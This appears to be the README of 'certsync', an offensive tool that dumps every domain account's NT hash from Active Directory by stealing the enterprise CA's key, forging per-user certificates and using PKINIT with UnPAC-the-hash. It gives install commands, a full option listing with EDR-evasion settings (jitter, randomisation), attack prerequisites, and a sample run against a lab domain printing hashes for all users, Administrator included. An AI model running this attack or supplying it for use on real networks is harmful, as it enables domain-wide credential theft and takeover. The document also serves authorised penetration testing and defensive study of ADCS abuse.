certsync
is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses golden certificate and UnPAC the hash.
It works in several steps:
- Dump user list, CA informations and CRL from LDAP
- Dump CA certificate and private key
- Forge offline a certificate for every user
- UnPAC the hash for every user in order to get nt and lm hashes
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Contrary to what we may think, the attack is not at all slower.
Locally:
git clone https://github.com/zblurx/certsync
cd certsync
pip install .
From Pypi:
pip install certsync
From BlackArch:
pacman -S certsync
All OS distribution packages:
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
[-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
[-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]
Dump NTDS with golden certificates and UnPAC the hash
options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-outputfile OUTPUTFILE
base output filename
CA options:
-ca-pfx pfx/p12 file name
Path to CA certificate. If used, will skip backup of CA certificate and private key
-ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP
authentication options:
-d domain.local, -domain domain.local
Domain name
-u username, -username username
Username
-p password, -password password
Password
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
connection options:
-scheme ldap scheme
-ns nameserver Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
OPSEC options:
-ldap-filter LDAP_FILTER
ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
-template cert.pfx base template to use in order to forge certificates
-timeout timeout Timeout between PKINIT connection
-jitter jitter Jitter between PKINIT connection
-randomize Randomize certificate generation. Takes longer to generate all the certificates
DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, certsync
does not require to use a Domain Administrator, it only require a CA Administrator.
This attack needs:
- A configured Entreprise CA on an ADCS server in the domain,
- PKINIT working,
- An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.
Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.
Some options were added to customize the behaviour of the tool:
-ldap-filter
: change the LDAP filter used to select usernames to certsync.-template
: use an already delivered certificate to mimic it when forging users certificates.-timeout
and-jitter
: change timeout between PKINIT authentication requests.-randomize
: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.
- Olivier Lyak for all his work on ADCS and certipy.
- Benjamin Delpy for the unPAC the hash technique.
- Will Schroeder and Lee Christensen for Certified Pre-Owned and Certify.
- Mayfly for his great lab: GOAD.